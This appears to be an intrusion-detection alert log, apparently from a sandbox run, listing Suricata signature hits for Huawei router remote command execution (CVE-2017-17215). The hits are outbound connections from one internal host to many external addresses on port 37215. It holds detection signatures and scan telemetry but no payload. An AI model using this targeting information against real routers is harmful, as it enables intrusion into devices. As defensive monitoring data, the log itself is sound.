                                                        06/13/24-21:32:34.192314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435437215192.168.2.1441.196.95.180
                                                        06/13/24-21:32:58.841120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520837215192.168.2.14156.44.249.22
                                                        06/13/24-21:32:15.606821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469037215192.168.2.14156.107.159.237
                                                        06/13/24-21:32:21.800923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529837215192.168.2.14156.172.59.19
                                                        06/13/24-21:32:42.408318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732637215192.168.2.14197.112.135.82
                                                        06/13/24-21:33:11.156473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676637215192.168.2.14156.132.204.236
                                                        06/13/24-21:32:44.452067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093837215192.168.2.14197.133.119.233
                                                        06/13/24-21:32:05.347701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660837215192.168.2.1441.97.97.127
                                                        06/13/24-21:32:34.216765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829437215192.168.2.14197.64.226.64
                                                        06/13/24-21:32:46.525923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276037215192.168.2.14197.213.183.73
                                                        06/13/24-21:32:48.573238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027637215192.168.2.14197.10.249.66
                                                        06/13/24-21:33:07.040837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770237215192.168.2.14156.235.241.228
                                                        06/13/24-21:32:54.726758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478637215192.168.2.1441.114.105.165
                                                        06/13/24-21:33:05.016590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583037215192.168.2.14197.78.180.231
                                                        06/13/24-21:32:23.941572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038837215192.168.2.1441.157.196.16
                                                        06/13/24-21:32:15.609210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505837215192.168.2.1441.241.135.136
                                                        06/13/24-21:32:28.028908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319637215192.168.2.14156.198.78.164
                                                        06/13/24-21:31:57.129847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.14156.82.201.224
                                                        06/13/24-21:32:13.564781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730437215192.168.2.1441.209.164.102
                                                        06/13/24-21:33:04.988200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048637215192.168.2.1441.240.77.124
                                                        06/13/24-21:33:13.211751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372437215192.168.2.14197.241.1.184
                                                        06/13/24-21:31:59.176943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349437215192.168.2.14156.66.100.2
                                                        06/13/24-21:32:40.376157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936837215192.168.2.1441.106.86.212
                                                        06/13/24-21:32:38.320541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739437215192.168.2.1441.97.129.66
                                                        06/13/24-21:32:42.407345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682237215192.168.2.1441.46.97.184
                                                        06/13/24-21:32:36.247385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127237215192.168.2.1441.232.35.140
                                                        06/13/24-21:32:30.079250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801237215192.168.2.14156.225.1.118
                                                        06/13/24-21:32:19.730181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347837215192.168.2.14197.13.232.148
                                                        06/13/24-21:31:57.129956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424437215192.168.2.1441.42.121.144
                                                        06/13/24-21:32:09.457077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.14197.92.38.6
                                                        06/13/24-21:32:07.418239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.1441.85.88.37
                                                        06/13/24-21:32:34.195612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616037215192.168.2.14156.231.202.122
                                                        06/13/24-21:32:50.614703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170037215192.168.2.14197.126.84.67
                                                        06/13/24-21:32:54.707144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869437215192.168.2.14156.223.37.228
                                                        06/13/24-21:31:59.176815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699237215192.168.2.1441.223.100.137
                                                        06/13/24-21:32:44.474618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.170.153.7
                                                        06/13/24-21:32:19.725585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260437215192.168.2.14197.5.163.119
                                                        06/13/24-21:33:09.089657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492437215192.168.2.14197.71.186.18
                                                        06/13/24-21:32:30.096446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142437215192.168.2.1441.69.94.72
                                                        06/13/24-21:31:57.090431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143637215192.168.2.14156.125.211.30
                                                        06/13/24-21:32:28.027294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473437215192.168.2.14197.114.213.155
                                                        06/13/24-21:33:02.909680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754837215192.168.2.14197.36.169.254
                                                        06/13/24-21:32:21.800504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919037215192.168.2.1441.145.104.233
                                                        06/13/24-21:33:15.276120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250837215192.168.2.14156.40.121.145
                                                        06/13/24-21:31:59.198591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125437215192.168.2.1441.29.99.140
                                                        06/13/24-21:32:42.424487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574837215192.168.2.1441.215.69.19
                                                        06/13/24-21:32:54.725695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085437215192.168.2.1441.168.1.111
                                                        06/13/24-21:32:56.754902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474637215192.168.2.1441.213.189.60
                                                        06/13/24-21:32:36.242294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229037215192.168.2.14197.210.249.118
                                                        06/13/24-21:32:48.572970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650637215192.168.2.14197.172.167.86
                                                        06/13/24-21:32:03.277587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397637215192.168.2.14197.163.2.0
                                                        06/13/24-21:33:11.157536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983237215192.168.2.1441.188.44.8
                                                        06/13/24-21:32:19.752788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3976237215192.168.2.14197.222.92.188
                                                        06/13/24-21:32:42.408826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466837215192.168.2.14156.241.45.187
                                                        06/13/24-21:32:25.974399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619237215192.168.2.14197.48.67.77
                                                        06/13/24-21:32:01.222763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647237215192.168.2.14156.255.131.213
                                                        06/13/24-21:32:13.545597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704637215192.168.2.14197.133.236.111
                                                        06/13/24-21:32:03.306220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348437215192.168.2.1441.101.93.122
                                                        06/13/24-21:33:02.910923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680637215192.168.2.1441.199.95.110
                                                        06/13/24-21:32:01.222717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481637215192.168.2.1441.75.138.125
                                                        06/13/24-21:32:48.551288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282437215192.168.2.1441.133.155.104
                                                        06/13/24-21:32:32.164860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830637215192.168.2.14197.201.79.201
                                                        06/13/24-21:32:17.678662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596037215192.168.2.14197.151.68.227
                                                        06/13/24-21:32:48.572079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797037215192.168.2.14156.93.248.12
                                                        06/13/24-21:33:11.174612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831237215192.168.2.14197.43.216.11
                                                        06/13/24-21:32:21.805117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768037215192.168.2.14156.12.36.72
                                                        06/13/24-21:32:28.048725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411437215192.168.2.14197.174.46.186
                                                        06/13/24-21:33:00.888594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237837215192.168.2.14197.216.193.82
                                                        06/13/24-21:32:36.246346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776837215192.168.2.14197.10.92.57
                                                        06/13/24-21:32:09.437363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.14156.93.133.93
                                                        06/13/24-21:32:28.028275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582237215192.168.2.1441.76.174.247
                                                        06/13/24-21:33:09.085249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629637215192.168.2.1441.178.179.109
                                                        06/13/24-21:32:30.078446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256637215192.168.2.14197.91.9.239
                                                        06/13/24-21:32:17.670993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14197.223.83.135
                                                        06/13/24-21:32:19.731657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253437215192.168.2.1441.237.100.143
                                                        06/13/24-21:33:11.173304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751637215192.168.2.14197.117.240.109
                                                        06/13/24-21:32:23.836633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761237215192.168.2.1441.65.158.112
                                                        06/13/24-21:32:48.551530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379837215192.168.2.14156.216.40.4
                                                        06/13/24-21:32:52.660605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204037215192.168.2.14197.54.6.250
                                                        06/13/24-21:32:30.079073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241037215192.168.2.14197.243.218.61
                                                        06/13/24-21:32:54.709940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413437215192.168.2.14156.117.98.32
                                                        06/13/24-21:32:58.839225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419637215192.168.2.1441.125.200.141
                                                        06/13/24-21:33:05.013558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166237215192.168.2.14156.104.147.175
                                                        06/13/24-21:32:40.358180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846237215192.168.2.1441.237.110.103
                                                        06/13/24-21:32:09.440696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802037215192.168.2.14156.93.54.18
                                                        06/13/24-21:32:15.611256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751637215192.168.2.14197.6.115.61
                                                        06/13/24-21:32:42.421389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552037215192.168.2.14156.94.60.177
                                                        06/13/24-21:32:01.248309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950437215192.168.2.14156.85.226.254
                                                        06/13/24-21:32:15.633892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499837215192.168.2.14197.123.42.130
                                                        06/13/24-21:32:25.969968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052437215192.168.2.14156.117.242.97
                                                        06/13/24-21:32:09.439850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493237215192.168.2.14156.205.183.215
                                                        06/13/24-21:32:09.453468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473837215192.168.2.1441.67.143.235
                                                        06/13/24-21:32:54.708780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257037215192.168.2.14156.176.5.171
                                                        06/13/24-21:32:38.318797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569637215192.168.2.14156.116.132.111
                                                        06/13/24-21:33:15.273813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974437215192.168.2.14156.41.222.88
                                                        06/13/24-21:32:42.409626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021437215192.168.2.14156.53.63.249
                                                        06/13/24-21:33:00.885634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891037215192.168.2.1441.148.124.119
                                                        06/13/24-21:32:48.553019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551437215192.168.2.1441.128.6.170
                                                        06/13/24-21:32:40.378115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911237215192.168.2.14156.31.232.184
                                                        06/13/24-21:32:46.524729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917637215192.168.2.14197.156.96.3
                                                        06/13/24-21:31:57.132824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201237215192.168.2.1441.199.109.61
                                                        06/13/24-21:31:59.198113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922637215192.168.2.1441.89.98.0
                                                        06/13/24-21:31:57.093175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965837215192.168.2.1441.106.105.176
                                                        06/13/24-21:31:57.137854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867237215192.168.2.1441.198.13.88
                                                        06/13/24-21:32:01.221229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894037215192.168.2.1441.190.81.189
                                                        06/13/24-21:32:52.659752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048237215192.168.2.14197.114.11.142
                                                        06/13/24-21:32:30.123531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934837215192.168.2.1441.54.6.176
                                                        06/13/24-21:32:32.155006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098437215192.168.2.14156.34.187.19
                                                        06/13/24-21:32:56.756351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170837215192.168.2.14197.195.230.125
                                                        06/13/24-21:32:56.758132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521837215192.168.2.14197.116.126.184
                                                        06/13/24-21:32:05.378398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399237215192.168.2.14156.92.20.172
                                                        06/13/24-21:32:46.502991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718837215192.168.2.14156.169.166.164
                                                        06/13/24-21:32:50.613211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753637215192.168.2.14197.246.221.214
                                                        06/13/24-21:33:09.101755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950437215192.168.2.14156.76.73.180
                                                        06/13/24-21:33:13.229637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318837215192.168.2.14197.240.186.186
                                                        06/13/24-21:32:01.221680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728037215192.168.2.14197.137.90.160
                                                        06/13/24-21:32:11.506556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544237215192.168.2.1441.38.85.59
                                                        06/13/24-21:32:48.552930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453437215192.168.2.14197.204.166.69
                                                        06/13/24-21:33:13.212948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137837215192.168.2.14197.252.176.46
                                                        06/13/24-21:32:42.418616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888037215192.168.2.14197.194.254.155
                                                        06/13/24-21:32:11.506728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178837215192.168.2.14197.241.161.32
                                                        06/13/24-21:33:13.214131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570237215192.168.2.14156.229.248.84
                                                        06/13/24-21:32:09.437902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781037215192.168.2.14156.255.208.240
                                                        06/13/24-21:33:02.935623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318837215192.168.2.1441.193.22.225
                                                        06/13/24-21:33:13.211540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401837215192.168.2.14156.217.42.163
                                                        06/13/24-21:32:09.439184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133237215192.168.2.1441.151.196.88
                                                        06/13/24-21:32:46.527641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566237215192.168.2.14197.66.88.247
                                                        06/13/24-21:31:57.090072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899637215192.168.2.14156.168.223.119
                                                        06/13/24-21:33:17.309005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.1441.247.195.40
                                                        06/13/24-21:33:00.869360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528637215192.168.2.1441.43.90.100
                                                        06/13/24-21:32:05.368781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874037215192.168.2.14156.83.54.151
                                                        06/13/24-21:33:02.954140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986237215192.168.2.14156.113.243.85
                                                        06/13/24-21:32:11.486037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373437215192.168.2.1441.167.165.215
                                                        06/13/24-21:33:09.106266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681837215192.168.2.1441.12.195.219
                                                        06/13/24-21:32:05.376562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831437215192.168.2.14156.150.133.156
                                                        06/13/24-21:32:01.222216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307037215192.168.2.14156.196.219.34
                                                        06/13/24-21:32:28.048462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602037215192.168.2.14156.29.13.141
                                                        06/13/24-21:32:58.821614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263037215192.168.2.14156.248.131.41
                                                        06/13/24-21:33:05.016844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910037215192.168.2.14197.8.62.104
                                                        06/13/24-21:33:17.308343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900637215192.168.2.14156.59.140.233
                                                        06/13/24-21:32:15.610586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402037215192.168.2.1441.25.147.48
                                                        06/13/24-21:33:11.173189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.14197.215.228.196
                                                        06/13/24-21:32:50.613937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791437215192.168.2.1441.167.17.210
                                                        06/13/24-21:32:42.404098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725837215192.168.2.14156.32.79.137
                                                        06/13/24-21:33:15.257824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590237215192.168.2.14156.84.9.94
                                                        06/13/24-21:32:17.672105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516037215192.168.2.14156.128.141.210
                                                        06/13/24-21:33:04.990901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165237215192.168.2.1441.44.47.146
                                                        06/13/24-21:32:13.545369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647437215192.168.2.14156.213.179.37
                                                        06/13/24-21:33:00.870478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458237215192.168.2.14197.166.37.172
                                                        06/13/24-21:32:56.784274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.1441.125.105.89
                                                        06/13/24-21:33:02.954957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359237215192.168.2.14197.252.90.85
                                                        06/13/24-21:33:02.912155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409637215192.168.2.14156.212.51.229
                                                        06/13/24-21:32:28.028324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439037215192.168.2.14197.88.83.228
                                                        06/13/24-21:33:00.887648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149637215192.168.2.14156.145.211.174
                                                        06/13/24-21:33:07.042877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473037215192.168.2.14197.198.52.160
                                                        06/13/24-21:33:15.254979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111837215192.168.2.1441.81.0.62
                                                        06/13/24-21:31:57.137824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345237215192.168.2.14156.155.54.24
                                                        06/13/24-21:32:50.630770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790037215192.168.2.14197.89.24.4
                                                        06/13/24-21:32:52.672072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260437215192.168.2.14197.110.207.175
                                                        06/13/24-21:32:38.298483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818037215192.168.2.14197.222.15.228
                                                        06/13/24-21:32:42.409659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403637215192.168.2.1441.3.82.179
                                                        06/13/24-21:32:34.214480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422437215192.168.2.14197.140.18.238
                                                        06/13/24-21:32:44.457908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227837215192.168.2.1441.236.187.131
                                                        06/13/24-21:32:21.785606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516437215192.168.2.14156.42.67.136
                                                        06/13/24-21:33:05.012104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997837215192.168.2.14156.6.168.71
                                                        06/13/24-21:32:28.048704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498037215192.168.2.1441.27.112.50
                                                        06/13/24-21:32:11.485638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412237215192.168.2.14156.40.152.52
                                                        06/13/24-21:32:44.478222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.14156.192.9.198
                                                        06/13/24-21:32:46.509727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079437215192.168.2.14156.116.227.176
                                                        06/13/24-21:33:11.176728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466037215192.168.2.14197.167.190.44
                                                        06/13/24-21:32:17.702518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497837215192.168.2.1441.14.108.70
                                                        06/13/24-21:32:42.420755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782637215192.168.2.14156.189.103.246
                                                        06/13/24-21:33:15.255498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533037215192.168.2.1441.6.123.25
                                                        06/13/24-21:32:05.371018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446237215192.168.2.14156.226.79.18
                                                        06/13/24-21:32:58.841840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802237215192.168.2.14197.231.242.78
                                                        06/13/24-21:33:02.913826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557037215192.168.2.14197.94.97.182
                                                        06/13/24-21:33:09.109466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.1441.204.142.242
                                                        06/13/24-21:32:05.349314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591237215192.168.2.14197.18.93.132
                                                        06/13/24-21:33:05.010098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475237215192.168.2.14156.221.180.131
                                                        06/13/24-21:32:11.506353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440637215192.168.2.1441.221.3.207
                                                        06/13/24-21:32:17.694487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681237215192.168.2.14197.62.29.2
                                                        06/13/24-21:32:30.096347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407837215192.168.2.14156.41.177.249
                                                        06/13/24-21:32:50.614622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315837215192.168.2.1441.2.221.138
                                                        06/13/24-21:32:50.630013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153637215192.168.2.14197.50.149.81
                                                        06/13/24-21:33:09.089163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069637215192.168.2.1441.74.222.119
